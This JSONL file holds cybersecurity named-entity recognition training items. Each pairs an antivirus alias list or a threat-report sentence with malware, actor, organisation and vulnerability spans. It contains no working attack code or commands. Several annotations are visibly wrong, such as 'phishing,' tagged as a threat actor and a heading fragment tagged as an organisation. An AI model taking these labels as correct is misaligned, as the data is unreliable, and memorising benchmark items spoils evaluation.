{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9923 Backdoor.MSIL TR/Ticker.A Trojan/Win32.Unknown Trojan:MSIL/Ticker.A Trojan.Ticker!i0gQR/g7sH4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004038", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Y3krat.25 Backdoor/W32.Y3krat.236032 Backdoor/Y3KRat.25 Backdoor.Y3krat.25 Trojan.Win32.Y3KRat.fqmw W32/Backdoor.CMH Backdoor.Trojan Win32/Y3KRat.25 BKDR_GQ.B Trojan.Y3K-3 Backdoor.Win32.Y3KRat.25 Backdoor.Y3KRat.AS!AU Backdoor.Win32.Y3KRat.236032[h] Win32.Backdoor.Y3krat.Ambw Backdoor.Y3krat.25 Backdoor.Win32.Y3KRat.25 Backdoor.Y3krat.25 BackDoor.Y3krat.18 Backdoor.Y3KRat.Win32.115 BKDR_GQ.B BehavesLike.Win32.Dropper.dc W32/Backdoor.PBIC-7717 Backdoor/Y3KRat.25.a BDS/Y3kRat.25.5 W32/Y3krat.25!tr.bdr Trojan[Backdoor]/Win32.Y3KRat Backdoor.Y3krat.25 Backdoor.W32.Y3KRat.25!c Win-Trojan/Y3KRat.236032 Backdoor:Win32/Y3KRat.2_5 Backdoor.RAT.Y3Backdoor.RAT.V1.8.a Backdoor.Y3KRat Bck/Y3KRat.H Backdoor.Win32.Y3KRat Backdoor.Y3krat.25 Backdoor.Win32.Y3KRat.25", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004039", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-PWS/W32.WebGame.161447 TrojanPSW.OnLineGames.adem Trojan-PSW.Win32.OnLineGames.adem Win32/PSW.OnLineGames.NNU Trojan.Packed.NsAnti Trojan.Spy-35117 Packer.Malware.NSAnti.1 TrojWare.Win32.PSW.OnLineGames.NNU Trojan.PWS.Gamania.9247 Win32/PSW.OnLineGames.NNU Packer.Malware.NSAnti.AL!IK Worm:Win32/Taterf.B Packer.Malware.NSAnti.1 Packer.Win32.Mian007.a Packer.Malware.NSAnti.AL W32/OnLineGames.fam!tr.pws", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004040", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Vundo Win.Downloader.8632-1 MalwareScope.Trojan-PSW.Pinch.1 Trojan.Click.4067 BehavesLike.Win32.Dropper.lc Trojan/Win32.QQPass.R1885", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004041", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Exploit.DCom.naf Exploit.Win32.DCom.khbzi Win.Trojan.Dcom-2 Trojan.Peed!mca6fnIo2DU Exploit.DCom.6 Exploit.DCom.Win32.185 EXP/DCom.Y.13 Win-Trojan/Berbew.51712 Exploit:Win32/Dcom.Y Exploit.DCom Trj/CI.A Net-Worm.Win32.Kolab Exploit.DCOM.RPC Trojan.Win32.DCom.NAF Win32/Trojan.Exploit.3e3", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004042", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Win64 Win32.Trojan.WisdomEyes.16070401.9500.9643 W64/Trojan.JENW-7287 Trojan.Uboat BKDR64_UBOAT.A BKDR64_UBOAT.A Backdoor:Win64/UBoatRAT.A Trj/CI.A Backdoor.Rat.UBoatRat", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004044", "source": "cyner2_train"}}
{"text": "The Gh0st malware is a widely used remote administration tool RAT that originated in China in the early 2000s.", "spans": {"MALWARE: The Gh0st malware": [[0, 17]], "MALWARE: remote administration tool RAT": [[35, 65]]}, "info": {"id": "cyner2_train_004045", "source": "cyner2_train"}}
{"text": "A popular mobile messaging application, LINE was used as a bait to lure targets in a targeted attack which hit Taiwan government.", "spans": {"ORGANIZATION: LINE": [[40, 44]], "ORGANIZATION: Taiwan government.": [[111, 129]]}, "info": {"id": "cyner2_train_004046", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Karba.24576 TrojanAPT.Garveep.DL4 Win32.Trojan.WisdomEyes.16070401.9500.9996 Trojan.Win32.Karba.ai Trojan.Win32.DownLoad3.cztnhk Win32.Trojan.Karba.Pdvp TrojWare.Win32.Dialer.AFXP Trojan.DownLoad3.18105 Trojan.Karba.Win32.9 W32/Trojan.DWPP-4593 TR/Spy.mulkf Trojan.DarkHotel.23 Trojan.Win32.Karba.ai Win32/Trojan.7fa", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004048", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.TDss.ET Trojan.TDSS Trojan.TDss.ET WORM_TDSS.SMY Win32.Trojan.WisdomEyes.16070401.9500.9999 WORM_TDSS.SMY Trojan.TDss.ET Packed.Win32.TDSS.f Trojan.TDss.ET Trojan.Win32.Tdss.btyvr Trojan.Win32.Z.Tdss.23552.A Packer.W32.Tdss.kYT0 Trojan.TDss.ET Win32.PkdTdss Trojan.Packed.365 Trojan.Kryptik.Win32.1293691 BehavesLike.Win32.FakeAlert.mh Trojan.Win32.Alureon Trojan[Packed]/Win32.TDSS Win32.Troj.TdssT.jr.102400 Trojan.TDss.ET Packed.Win32.TDSS.f TrojanDownloader:Win32/Rugzip.A Packed/Win32.Tdss.C53201 Trojan.TDSS.01414 Win32.Packed.Tdss.Pgdn W32/PackTDssfilter.I!tr Win32/Trojan.d9b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004049", "source": "cyner2_train"}}
{"text": "On the 27th of June 2017, a new cyberattack hit many computer systems in Ukraine, as well as in other countries.", "spans": {"SYSTEM: computer systems": [[53, 69]]}, "info": {"id": "cyner2_train_004052", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.RansomeDNZ.Trojan Ransom/W32.crysis.94720 Ransom.Crysis.S162740 Trojan/Filecoder.Crysis.l Win32.Trojan.WisdomEyes.16070401.9500.9991 W32/Wadhrama.B Win32.Trojan-Ransom.VirusEncoder.A Trojan-Ransom.Win32.Crusis.to Trojan.Win32.Filecoder.emdnxn Trojan.Win32.Ransom.94720.F Troj.Ransom.W32.Crusis.tpcS TrojWare.Win32.Crysis.D Trojan.Encoder.3953 Trojan.Crusis.Win32.806 BehavesLike.Win32.Ransom.nc Trojan-Ransom.Crysis W32/Trojan.ILHO-9216 Trojan.Crypren.ic Trojan.Ransom.Crysis.6 Ransom.Crysis/Variant Trojan-Ransom.Win32.Crusis.to Trojan.Ransom.Crysis Hoax.Crusis Trj/GdSda.A Trojan-Ransom.Win32.Crysis.a W32/Crysis.L!tr.ransom Win32/Trojan.Ransom.f44", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004054", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Nagoot.FC.161 MSIL.Trojan.Injector.l W32/Trojan.MIPO-0322 Downloader.Ponik Trojan.Win32.Inject1.exqnlv Trojan.Win32.Z.Nagoot.68608.A Trojan.Inject1.54664 Trojan.MSIL.Nagoot TR/Dropper.MSIL.rjbya Trojan.MSIL.Bladabindi.1 Trojan:MSIL/Nagoot.A Trojan.PasswordStealer Trj/GdSda.A MSIL/Injector.IFP!tr Win32/Trojan.62b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004057", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.XhglJIK1DLL.Rootkit Trojan/W32.Cariez.32768.AU BackDoor-DTL.a Trojan.Cariez.Win32.270 Trojan/Koutodoor.dx TROJ_CARIEZ.SMA Win32.Trojan.WisdomEyes.16070401.9500.9997 TROJ_CARIEZ.SMA Win.Trojan.Cariez-189 Trojan.Win32.Cariez.a Trojan.Win32.Cariez.byufu TrojWare.Win32.Zybr.A Trojan.RKDoor.59 BackDoor-DTL.a Trojan.Win32.Cariez Trojan/Win32.Cariez Adware.Heur.E02D22 Trojan.Win32.Cariez.a Trojan:Win32/Cariez.A Backdoor/Win32.Koutodoor.R1208 TScope.Malware-Cryptor.SB Trj/Cariez.A Trojan.Win32.Cariez.bhg", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004061", "source": "cyner2_train"}}
{"text": "While Japan is still the most heavily targeted geographic region by this particular actor, we also observed instances where individuals or organizations in Taiwan, Tibet, and Russia also may have been targeted.", "spans": {"THREAT_ACTOR: actor,": [[84, 90]], "ORGANIZATION: individuals": [[124, 135]], "ORGANIZATION: organizations": [[139, 152]]}, "info": {"id": "cyner2_train_004062", "source": "cyner2_train"}}
{"text": "This report describes an extensive malware, phishing, and disinformation campaign active in several Latin American countries, including Ecuador, Argentina, Venezuela, and Brazil.", "spans": {"MALWARE: malware,": [[35, 43]], "THREAT_ACTOR: phishing,": [[44, 53]], "THREAT_ACTOR: disinformation campaign": [[58, 81]]}, "info": {"id": "cyner2_train_004063", "source": "cyner2_train"}}
{"text": "This blog links this recent activity with previous isolated public reporting on similar attacks we believe are related.", "spans": {}, "info": {"id": "cyner2_train_004064", "source": "cyner2_train"}}
{"text": "Collection of payloads being delivered via the Apache Struts vulnerability - CVE-2017-5638", "spans": {"MALWARE: payloads": [[14, 22]], "VULNERABILITY: the Apache Struts vulnerability": [[43, 74]]}, "info": {"id": "cyner2_train_004065", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Gargamel.A Backdoor.Gargamel.A Backdoor.Trojan BKDR_GARGAM.A Backdoor.Win32.Gargamel.a Backdoor.Gargamel.A Backdoor.Gargamel!8hABCfPKz0o Backdoor.Win32.Gargamel.Downloader Backdoor.Gargamel.A BackDoor.Gargamel BDS/Gargamel.A.10 BKDR_GARGAM.A Win-Trojan/Gargamel.17717 Backdoor.Gargamel.A Backdoor.Trojan Win32/Gargamel.Downloader Backdoor.Win32.Gargamel W32/Uploade.B!tr.bdr BackDoor.Gargamel.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004066", "source": "cyner2_train"}}
{"text": "A backdoor also known as: KillCMOS.K Trojan.KillCMOS.O Trojan.KillCMOS.O Trojan.KillCMOS.O Trojan.KillCMOS.O TROJ_KILLCMOS.L Win.Trojan.KillCMOS-14 Trojan.KillCMOS.O Trojan.DOS.KillCMOS.k Trojan.Dos.KillCMOS.blmit Troj.DOS.KillCMOS.k!c Trojan.KillCMOS.O Trojan.KillCMOS.O TROJ_KILLCMOS.L KillCMOS.h TR/KillCMOS.J Trojan:DOS/KillCMOS.remnants Trojan.DOS.KillCMOS.k KillCMOS.h Dos.Trojan.Killcmos.Ebgc Trojan.KillCMOS Trj/KillCMOS.K Win32/Trojan.8f3", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004067", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W97M.Downloader.DF HEUR.VBA.Trojan.e W2KM_DLOADR.YYSQD Trojan-Dropper:W97M/MaliciousMacro.B W2KM_DLOADR.YYSQD TrojanDropper:W97M/Miskip.B!dha Trojan-Dropper.W97M.Miskip heur.macro.infect.l", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004068", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.OnGameELIYTAAD.Trojan Trojan-Ransom.Win32.Blocker!O Backdoor.Bustem.A5 Trojan.BCMiner Troj.Ransom.W32.Blocker!c Trojan.Johnnie.D545 TSPY_DOWNLOADER_CA0827C3.TOMC Trojan-Ransom.Win32.Blocker.jcku Trojan.Win32.AVKill.dqatba Trojan.Win32.A.Scar.118272.A Trojan.AVKill.11731 TSPY_DOWNLOADER_CA0827C3.TOMC BehavesLike.Win32.LoadMoney.ch Backdoor.Win32.Bustem Trojan/Win32.Unknown Backdoor:Win32/Bustem.A Trojan-Ransom.Win32.Blocker.jcku Trojan/Win32.Downloader.R14675 Hoax.Blocker Trojan-ransom.Win32.Blocker.cwfe Win32/RootKit.Rootkit.7e5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004069", "source": "cyner2_train"}}
{"text": "The growing number of samples demonstrate that criminals are actively adopting this malware.", "spans": {"THREAT_ACTOR: criminals": [[47, 56]], "MALWARE: malware.": [[84, 92]]}, "info": {"id": "cyner2_train_004070", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Hoax.Win32.BadJoke!O W32/Joke.O Joke.Irritan JOKE_IRRITAN.A Hoax.Win32.BadJoke.Irritan Riskware.Win32.Irritan.hrfs Joke.Win32.Irritan.A FDOS.Winskill Backdoor.PePatch.Win32.34151 JOKE_IRRITAN.A W32/Joke.ASXP-0124 not-virus:Joke.Win32.Irritan JOKE/Irritan.A HackTool[Hoax]/Win32.Irritan Win32.Joke.Irritan.kcloud Win-AppCare/Irritan.248877 Trojan.Win32.BadJoke.AD Win32/Irritan.A Hoax.Win32.BadJoke.Irritan Win32/Joke.bee", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004071", "source": "cyner2_train"}}
{"text": "Threat actors are taking advantage of Microsoft OneNote's ability to embed files and use social engineering techniques, such as phishing emails and lures inside the OneNote document, to get unsuspecting users to download and open malicious files.", "spans": {"THREAT_ACTOR: Threat actors": [[0, 13]], "SYSTEM: Microsoft OneNote's": [[38, 57]], "MALWARE: malicious files.": [[230, 246]]}, "info": {"id": "cyner2_train_004072", "source": "cyner2_train"}}
{"text": "With this group being active for roughly one year, we decided to revisit this threat to determine what, if any, changes had been made to their toolset.", "spans": {"ORGANIZATION: group": [[10, 15]], "MALWARE: threat": [[78, 84]], "MALWARE: toolset.": [[143, 151]]}, "info": {"id": "cyner2_train_004075", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Dropper/W32.Stabs.90045 TrojanDropper.Stabs.cvo Trojan/Dropper.Stabs.dka Win32/Bifrose.NDU W32/Trojan2.HEAS W32/Smalltroj.QFFP BKDR_BIFROSE.SMC BackDoor.IRC.Sdbot.3713 BKDR_BIFROSE.SMC Trojan-Downloader.Win32.Buzus!IK W32/Trojan2.HEAS TrojanDownloader:Win32/Buzus.F Trojan-Downloader.Win32.Buzus W32/Injector.IA!tr Trj/Buzus.AH", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004076", "source": "cyner2_train"}}
{"text": "These components include a unique loader, downloader, and not one but two different trojan components.", "spans": {"MALWARE: loader, downloader,": [[34, 53]], "MALWARE: trojan": [[84, 90]]}, "info": {"id": "cyner2_train_004077", "source": "cyner2_train"}}
{"text": "**Dump Domain Registration Patterns:*From about 2015 to at least October 2018 possibly longer, IBM X-Force assesses that ITG08's POS malware used the same notable domain naming convention: all known dump domains used by FrameworkPOS and GratefulPOS contained the same base name -akamaitechnologies.com. In fact, all said domains are nearly identical looking to a legitimate Akamai content delivery network CDN domain, differing only by a single character replacing a .' with - .", "spans": {"ORGANIZATION: **Dump Domain Registration Patterns:*From": [[0, 41]], "ORGANIZATION: IBM X-Force": [[95, 106]], "MALWARE: ITG08's POS malware": [[121, 140]], "MALWARE: FrameworkPOS": [[220, 232]], "MALWARE: GratefulPOS": [[237, 248]], "SYSTEM: content delivery network CDN": [[381, 409]]}, "info": {"id": "cyner2_train_004081", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Script.SWF.C603 Exp.SWF.Rig.EK.4476 Exploit.SWF.Downloader SWF_EXKIT.THAAEH Script.SWF.C603 Script.SWF.C603 SWF.S.Exploit.13894 Script.SWF.C603 Script.SWF.C603 Exploit.SWF.1232 SWF_EXKIT.THAAEH SWF/Exploit-Rig.h SWF/Trojan.VJFQ-3 Script.SWF.C603 SWF/Exploit-Rig.h Trojan.SWF.Exploit swf.cve-2015-8651.rig.a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004082", "source": "cyner2_train"}}
{"text": "Adobe independently patched the vulnerability CVE-2015-3043 in APSB15-06.", "spans": {"ORGANIZATION: Adobe": [[0, 5]], "VULNERABILITY: vulnerability CVE-2015-3043": [[32, 59]]}, "info": {"id": "cyner2_train_004083", "source": "cyner2_train"}}
{"text": "The KOVTER malware embeds a JavaScript into the registry and executes a PowerShell script which eventually loads the main KOVTER binaries.", "spans": {"MALWARE: The KOVTER malware": [[0, 18]]}, "info": {"id": "cyner2_train_004086", "source": "cyner2_train"}}
{"text": "CSIS has been informed about a number of targeted spear phishing attacks against Danish chiropractors.", "spans": {"ORGANIZATION: CSIS": [[0, 4]], "ORGANIZATION: Danish chiropractors.": [[81, 102]]}, "info": {"id": "cyner2_train_004088", "source": "cyner2_train"}}
{"text": "The group focuses on companies that have intellectual property or sensitive information like those in the Defense and High-Tech industries.", "spans": {"THREAT_ACTOR: The group": [[0, 9]], "ORGANIZATION: companies": [[21, 30]], "ORGANIZATION: the Defense": [[102, 113]], "ORGANIZATION: High-Tech industries.": [[118, 139]]}, "info": {"id": "cyner2_train_004091", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TjnDownldr.SmaCod.S162507 Downloader.Tiny.Win32.8086 Win32.Trojan.WisdomEyes.16070401.9500.9968 Trojan.Win32.Tiny.elyeva TrojWare.Win32.TrojanDownloader.Tiny.NNO Trojan-Downloader.Win32.Tiny Trojan.Mikey.DECAC Trojan/Win32.Downloader.R193768 OScope.Trojan.0216 W32/Tiny.NNO!tr Win32/Trojan.823", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004095", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Uds.Dangerousobject.Multi!c Win32.Trojan.WisdomEyes.16070401.9500.9999 TR/Downloader.A.2357 Trojan.Kazy.D60565 TrojanDownloader:MSIL/Muxtart.A Win32.Trojan.Downloader.Szlu", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004096", "source": "cyner2_train"}}
{"text": "Despite having a reputation of evolution, there doesn't seem to be very many recent updates on this malware family though.", "spans": {}, "info": {"id": "cyner2_train_004097", "source": "cyner2_train"}}
{"text": "The latest round of attacks in 2015 uses a stolen code signing certificate belonging to Taiwanese electronics maker Acer and an unknown Flash Player exploit.", "spans": {"ORGANIZATION: Taiwanese electronics maker Acer": [[88, 120]], "MALWARE: unknown Flash Player exploit.": [[128, 157]]}, "info": {"id": "cyner2_train_004098", "source": "cyner2_train"}}
{"text": "However, in addition to new variants of malicious .hta, we find new victims, .rar attachments with RTLO spearphishing, and the deployment of a 0day from Hacking Team.", "spans": {"MALWARE: malicious": [[40, 49]], "VULNERABILITY: 0day": [[143, 147]], "ORGANIZATION: Hacking Team.": [[153, 166]]}, "info": {"id": "cyner2_train_004099", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.eHeur.Malware14 Win32.Malware!Drop Win32.Trojan.WisdomEyes.16070401.9500.9997 Trojan-Downloader.Win32.Upatre.gqes Trojan.Win32.KillProc.expayv TrojWare.Win32.GozNym.AA Trojan.KillProc.54838 Downloader.Upatre.Win32.65195 Trojan.Win32.Tofsee Trojan.Banker.GozNym.gs TR/Crypt.Xpack.sqizh Backdoor:Win32/Tofsee.T Trojan-Downloader.Win32.Upatre.gqes Win32.Malware!Drop Backdoor.PasswordStealer Trj/GdSda.A Win32/Tofsee.BJ W32/Kryptik.GCVH!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004100", "source": "cyner2_train"}}
{"text": "The attack leveraged malware we called BlackLambert', which was used to target a high profile organization in Europe.", "spans": {"MALWARE: malware": [[21, 28]], "MALWARE: BlackLambert',": [[39, 53]], "ORGANIZATION: high profile organization": [[81, 106]]}, "info": {"id": "cyner2_train_004101", "source": "cyner2_train"}}
{"text": "A backdoor also known as: BDS/Flood.IRC.2 MemScan:Trojan.Flooder.I IRC.Flood Trojan.Flood BackDoor.Ircbot.BCV IRC.Flood IRC.Flood Trojan.Backdoor.Flood.IRC.2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004103", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Scar.28672.J Win32.Trojan.Scar.aeru.4.Pack Trojan/Scar.aeru Trojan.Scar.AEY W32/Tibs.DOHY Trojan.Win32.Scar.aeru TrojWare.Win32.Scar.BA Win32/SillyAutorun.CVZ Trojan/Scar.axz Trojan/Win32.Scar Trojan.Win32.Scar!IK TrojanDownloader:Win32/Yibohbin.A Trojan.Win32.Scar.28672.I Win-Trojan/Scar.28672.AH Trojan.Win32.Scar.aeru Trojan.DL.Win32.Tiny.bug Trojan.Win32.Scar Trj/Scar.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004104", "source": "cyner2_train"}}
{"text": "Figure 4 – Checking for installed apps Based on a thorough analysis of the code , the most interesting technical capabilities include : Capturing screenshots Enabling or changing administration settings Opening and visiting any URL Disabling Play Protect Recording audio Making phone calls Stealing the contact list Controlling the device via VNC Sending , receiving and deleting SMS Locking the device Encrypting files on the device and external drives Searching for files Retrieving the GPS location Capturing remote control commands from Twitter and Telegram Pushing overlays Reading the device ID The malware includes a keylogger that works in every app installed on the Android device .", "spans": {"SYSTEM: Twitter": [[541, 548]], "SYSTEM: Telegram": [[553, 561]], "SYSTEM: Android": [[675, 682]]}, "info": {"id": "cyner2_train_004108", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Android.Trojan.WipeLocker.A Android.Habey.A Trojan.Wipelock..1 A.H.Fra.Elite Android.Trojan.Wipelock.b Android/Wipelock.A HEUR:Trojan.AndroidOS.Soceng.f Android.Trojan.WipeLocker.A Trojan.Android.Elite.dmubjt Troj.Androidos.Habey!c Trojan-Spy:Android/SmsSpy.FW Android.Elite.1.origin ANDROID/Elite.A Android/Wipelock.A!tr Trojan/Android.Habey Android.Trojan.WipeLocker.A HEUR:Trojan.AndroidOS.Soceng.f Android-Trojan/WipeLocker.8493 Trojan.Android.Locker.c Trojan.AndroidOS.Wipelock Android.Trojan.WipeLocker.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004109", "source": "cyner2_train"}}
{"text": "One of the samples we looked at SHA256:e154e62c1936f62aeaf55a41a386dbc293050acec8c4616d16f75395884c9090 contained a family of backdoor that hasn't been referenced in public documents.", "spans": {"MALWARE: family of": [[116, 125]], "MALWARE: backdoor": [[126, 134]]}, "info": {"id": "cyner2_train_004110", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.KRBanker.615936 Trojan.Sehijak.A7 Adware.Kraddare Adware.Kraddare.Win32.3892 Trojan.Zusy.D2CF65 W32/Banki.A Backdoor.Win32.Servidor.ac Trojan.Win32.RDN.eatfup Win32.Backdoor.Servidor.Pboq TrojWare.Win32.Sehijak.DA Trojan.DownLoader21.32804 BehavesLike.Win32.MultiPlug.jc W32/Banki.DFFU-6658 Backdoor.Servidor.b Trojan:Win32/Sehijak.A Backdoor.Win32.Servidor.ac Trojan/Win32.Banki.R175311 Backdoor.Servidor Win32/Adware.Kraddare.LP PUA.Kraddare! PUA.Kraddare W32/Servidor.AC!tr.bdr Win32/Backdoor.c5c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004111", "source": "cyner2_train"}}
{"text": "CrowdStrike has released two blog posts detailing Sakula campaigns and continues to investigate its usage.", "spans": {"ORGANIZATION: CrowdStrike": [[0, 11]], "THREAT_ACTOR: Sakula campaigns": [[50, 66]]}, "info": {"id": "cyner2_train_004112", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9978 Trojan.Win32.ExtenBro.evtqgw Trojan.MSIL.ExtenBro Trojan/MSIL.fqcj TR/ExtenBro.vezgg Trojan:MSIL/ExtenBro.A Trj/GdSda.A Win32/Trojan.444", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004113", "source": "cyner2_train"}}
{"text": "Escelar originally surfaced in January of this year, and has since had roughly 100,000 instances of attempted infections.", "spans": {"MALWARE: Escelar": [[0, 7]]}, "info": {"id": "cyner2_train_004114", "source": "cyner2_train"}}
{"text": "At the same time, the group has been improving their ability to operate the business side of a ransomware organization.", "spans": {"THREAT_ACTOR: the group": [[18, 27]], "THREAT_ACTOR: a ransomware organization.": [[93, 119]]}, "info": {"id": "cyner2_train_004115", "source": "cyner2_train"}}
{"text": "A backdoor also known as: BehavesLike.Win32.BackdoorNJRat.qm Trojan.Kazy.DEF49 Trojan/Win32.Llac.R18525", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004116", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.DLDrop.NSIS Trojan.Injector.Win32.385163 Trojan/Injector.cuom Trojan.Razy.D7CE0 W32/Injector.AKD Trojan.Win32.CUOM.ebfhyw W32/Injector.OIMQ-3591 TR/AD.Enestedel.ubzhk Ransom:Win32/Enestedel.B!rsm Trj/GdSda.A Win32/Injector.CUOM Trojan.Injector!1PtHxYGwvhY", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004117", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9829 Backdoor.Ehdoor", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004118", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Dropper.Win32.Dorifel!O Trojan.FakeMS.ED Trojan/Dropper.Dorifel.eav Win32.Trojan.WisdomEyes.16070401.9500.9997 W32/Trojan.GTVK-8195 W32.IRCBot.NG Trojan.MSIL.Crypt.fqbo Trojan.DownLoader6.25796 Dropper.Dorifel.Win32.1316 TrojanDropper.Dorifel.afo Trojan[Dropper]/Win32.Dorifel Win32.Troj.Dorifel.kcloud Trojan.Zusy.D115D1 Trojan.MSIL.Crypt.fqbo Trojan:MSIL/Belfusba.A TrojanDropper.Dorifel Trj/CI.A MSIL/Selenium.A Trojan.Kryptik!LBVVyRsvO34 MSIL/Selenium.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004119", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Virus.W32.Virus!c Trojan/Spy.KeyLogger.au Trojan.Raw.KeyLog.epwywq BehavesLike.Win32.Cutwail.tc Trojan.Shelma.bbh Trojan/Win32.Shelma Trojan:Win32/Ronohu.A Trj/CI.A Python/Spy.KeyLogger.V Trojan.Python.Spy Python/KeyLogger.V!tr.spy", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004120", "source": "cyner2_train"}}
{"text": "Usually, these are done via HTTP or other TCP/IP connections.", "spans": {}, "info": {"id": "cyner2_train_004121", "source": "cyner2_train"}}
{"text": "Recently, while reading a blog post from security vendor Akamai, we spotted a similar situation.", "spans": {"ORGANIZATION: security vendor Akamai,": [[41, 64]]}, "info": {"id": "cyner2_train_004123", "source": "cyner2_train"}}
{"text": "The forum provides members with tools to patch RDP Remote Desktop Protocol servers to support multiple user logins, as well as other hacking tools, such as proxy installers and sysinfo collectors.", "spans": {"THREAT_ACTOR: forum": [[4, 9]], "THREAT_ACTOR: members": [[19, 26]], "MALWARE: tools": [[32, 37]], "SYSTEM: RDP Remote Desktop Protocol servers": [[47, 82]], "MALWARE: hacking tools,": [[133, 147]], "SYSTEM: proxy": [[156, 161]], "SYSTEM: sysinfo": [[177, 184]]}, "info": {"id": "cyner2_train_004124", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.KRSign.810456 Win32.Trojan.WisdomEyes.16070401.9500.9958 Spyware.BL Trojan.ZxShellCRTD.Win32.10098 Backdoor:Win32/Zxshell.A!dha Win32/Backdoor.c4c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004126", "source": "cyner2_train"}}
{"text": "Petya is a form of ransomware that overwrites the master boot record MBR in order to block access to both the user's files and operating system.", "spans": {"MALWARE: Petya": [[0, 5]], "MALWARE: ransomware": [[19, 29]], "SYSTEM: master boot record MBR": [[50, 72]], "SYSTEM: operating system.": [[127, 144]]}, "info": {"id": "cyner2_train_004127", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.7F39 Trojan.Podjot.A Trojan.Kazy.D2D8D TROJ_PODJOT.SM1 Win32.Trojan.WisdomEyes.16070401.9500.9924 TROJ_PODJOT.SM1 MalCrypt.Indus! Trojan:Win32/Podjot.A Trojan/Win32.Zapchast.R21212 Virus.Win32.Cryptor", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004128", "source": "cyner2_train"}}
{"text": "The threat actor behind Duqu appears to have launched attacks at the venues for some of these high level talks.", "spans": {"THREAT_ACTOR: The threat actor": [[0, 16]], "MALWARE: Duqu": [[24, 28]]}, "info": {"id": "cyner2_train_004131", "source": "cyner2_train"}}
{"text": "The attackers behind this campaign went to some lengths to disguise their activities, including using domains names disguised as antivirus AV company websites for their command and control C C servers.", "spans": {"THREAT_ACTOR: attackers": [[4, 13]], "THREAT_ACTOR: campaign": [[26, 34]]}, "info": {"id": "cyner2_train_004132", "source": "cyner2_train"}}
